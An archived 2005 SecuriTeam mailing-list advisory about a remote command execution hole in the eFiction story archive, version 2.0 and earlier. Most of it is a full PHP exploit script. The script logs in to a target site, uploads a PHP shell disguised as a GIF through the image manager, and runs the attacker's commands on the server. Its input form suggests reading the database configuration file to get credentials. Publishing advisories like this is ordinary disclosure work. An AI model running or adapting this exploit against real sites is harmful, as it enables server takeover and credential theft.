[EXPL] eFiction Remote Commands Execution (GIF, Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 11/27/05

Next message: SecuriTeam: "[UNIX] ktools Buffer Overflow"

Previous message: SecuriTeam: "[NT] MSN Messenger Authentication DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 27 Nov 2005 12:47:55 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

eFiction Remote Commands Execution (GIF, Exploit)
------------------------------------------------------------------------

SUMMARY

<http://sourceforge.net/projects/efiction> EFiction is an easy to use
php/mysql based story archiving system. It allows for private or public
submissions of original stories to a site through web interface. It has a
fully skinnable front end and a fully functional back end.

A vulnerability in eFiction allows remote attackers to cause the program
to execute arbitrary commands.

DETAILS

Vulnerable Systems:
* eFiction version 2.0 and prior.

Exploit:
<?php
# ---efiction20_xpl.php 15.19 17/11/2005 #
# #
# eFiction <= 2.0 fake GIF Shell Upload #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "If fighting is sure to result in victory, then you must fight,
#
# even though the ruler forbid it; if fighting will not result in victory,
#
# then you must not fight even at the ruler's bidding." #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ******** eFiction <= 2.0 remote commands xctn
*********
</title><meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111;
SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; }
img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important}
option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1
{font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size:
0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} *
{font-style:
normal !important} *{text-decoration: none !important}
a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration:
underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,
sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,
sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p
class="Stile6">
********* eFiction <= 2.0 remote commands xctn **********</p><p
class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org></p><table width="84%"><tr><td width="43%">
<form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'"> <p><input
type="text" name="host"> <span class="Stile5">* hostname
(ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path
(ex:
/efiction/ or just / ) </span></p><p><input type="text" name="command">
<span
class="Stile5"> * specify a command , "cat ../../../data/dbconfig.php" to
see
database user & password </span></p> <p><input type="text"
name="username"><span
class="Stile5"> * username...</span> </p> <p> <input type="password"
name="password"><span class="Stile5">* ... and password to eFiction,
required to
upload the fake gif </span> </p> <p> <input type="text" name="port">
<span class="Stile5">specify a port other than 80 ( default value )</span>
</p> <p> <input type="text" name="proxy"><span class="Stile5"> send
exploit
through an HTTP proxy (ip:port)</span></p><p><input type="submit"
name="Submit"
value="go!"></p></form> </td></tr></table></body></html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
       $ji=0;
       $ci++;
       echo "<td> </td>";
       for ($li=0; $li<=15; $li++)
           { echo "<td>".$headeri[$li+$ki]."</td>";
              }
      $ki=$ki+16;
      echo "</tr><tr>";
      }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
           { echo "<td>&nbsp&nbsp</td>";
            }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if
not,load
               //next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
          echo "socket_create() failed: reason: " .
socket_strerror($socket) . "<br>";
          }
       else
         { $c = preg_match($proxy_regex,$proxy);
       if (!$c) {echo 'Not a valid prozy...';
            die;
            }
          echo "OK.<br>";
          echo "Attempting to connect to ".$host." on port
".$port."...<br>";
          if ($proxy=='')
          {
           $result = socket_connect($socket, $host, $port);
          }
          else
          {

          $parts =explode(':',$proxy);
          echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
          $result = socket_connect($socket, $parts[0],$parts[1]);
          }
          if ($result < 0) {
                   echo "socket_connect() failed.\r\nReason: (".$result.")
" . socket_strerror($result) . "<br><br>";
                  }
                else
                  {
                   echo "OK.<br><br>";
                   $html= '';
                   socket_write($socket, $packet, strlen($packet));
                   echo "Reading response:<br>";
                   while ($out= socket_read($socket, 2048)) {$html.=$out;}
                   echo nl2br(htmlentities($html));
                   echo "Closing socket...";
                   socket_close($socket);

                  }
         }
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
   {$ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) { echo 'No response from '.htmlentities($host);
            die; }
   }
       else
      {
      $c = preg_match($proxy_regex,$proxy);
       if (!$c) {echo 'Not a valid prozy...';
            die;
            }
      $parts=explode(':',$proxy);
      echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
      $ock=fsockopen($parts[0],$parts[1]);
      if (!$ock) { echo 'No response from proxy...';
            die;
            }
      }
fputs($ock,$packet);
if ($proxy=='')
{

  $html='';
  while (!feof($ock))
   {
    $html.=fgets($ock);
   }
}
else
{
  $html='';
  while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
  {
   $html.=fread($ock,1);
  }
}
fclose($ock);
echo nl2br(htmlentities($html));
}

$host=$_POST[host];$path=$_POST[path];$username=$_POST[username];
$password=$_POST[password];$port=$_POST[port];$command=$_POST[command];
$proxy=$_POST[proxy];

if (($host<>'') and ($path<>'') and ($username<>'') and ($password<>'')
and ($command<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error...
check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

#STEP 1 -> Login
$data='-----------------------------7d53102423092a
Content-Disposition: form-data; name="penname"

'.$username.'
-----------------------------7d53102423092a
Content-Disposition: form-data; name="password"

'.$password.'
-----------------------------7d53102423092a
Content-Disposition: form-data; name="submit"

Submit
-----------------------------7d53102423092a--';

$packet="POST ".$p."user.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."user.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d53102423092a\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)\r\n";
$packet.="Host: ".$host.$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$COOKIE=$temp2[0];
echo '<br>Your cookie: '.htmlentities($COOKIE);

$data='-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="upfile"; filename="C:\suntzu.php"
Content-Type: image/gif

'.$SHELL.'
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="submit"

upload
-----------------------------7d529a1d23092a--
';

$packet="POST ".$p."user.php?action=manageimages&upload=upload
HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*\r\n";
$packet.="Referer:
http://".$host.":".$port.$path."/user.php?action=manageimages&upload=upload\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$COOKIE."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);

#STEP 3 -> Launch commands...
$packet="GET
".$p."stories/".$username."/images/suntzu.php?cmd=".urlencode($command)."
HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("GIF89",$html)) {echo "Exploit succeeded..."; die;}
else {echo "Trying STEP 4...";}

#STEP 4 -> If Step 3 failed... maybe this is efiction 2.0, cycliing GET
requests...
for ($i=1; $i<=100; $i++)
{
$packet="GET
".$p."stories/".$i."/images/suntzu.php?cmd=".urlencode($command)."
HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("GIF89",$html)) {echo "Exploit succeeded..."; die;}
}
//if you are here...
echo "Exploit failed...<br>";
}
else
{echo "Fill * required fields, optionally specify a proxy...";}
?>

ADDITIONAL INFORMATION

The information has been provided by rgod.
The original article can be found at: <http://rgod.altervista.org>
http://rgod.altervista.org

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[UNIX] ktools Buffer Overflow"

Previous message: SecuriTeam: "[NT] MSN Messenger Authentication DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[NT] Cross Application Scripting in Trend Micros Antivirus Software
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The SecuriTeam alerts
list - Free, Accurate, Independent. ... When the product alerts the user of a possible virus,
it creates an HTML ... (Securiteam)
[NT] Microsoft Windows NTFS Improper Handler Closing
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... from a system
shutdown, uninitialized data may be visible in files from ... (Securiteam)
[TOOL] tcpstatflow - Covert Tunnel Detector
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... For example, he could set
up a SSH server on the Internet, listening port ... one way and the opposite (within a
single TCP connection). ... (Securiteam)
[EXPL] Eudora Attachment Spoof Exploit Revisited
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... present in the newest release
of Eudora. ... Can be exploited if there is more than one way into attach: in my setup
... (Securiteam)
[UNIX] Phorum SQL Injection (userlogin.php)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... An SQL injection vulnerability
exists in the 'userlogin.php' script. ... the MD5 hash of the user one character at a time.
... (Securiteam)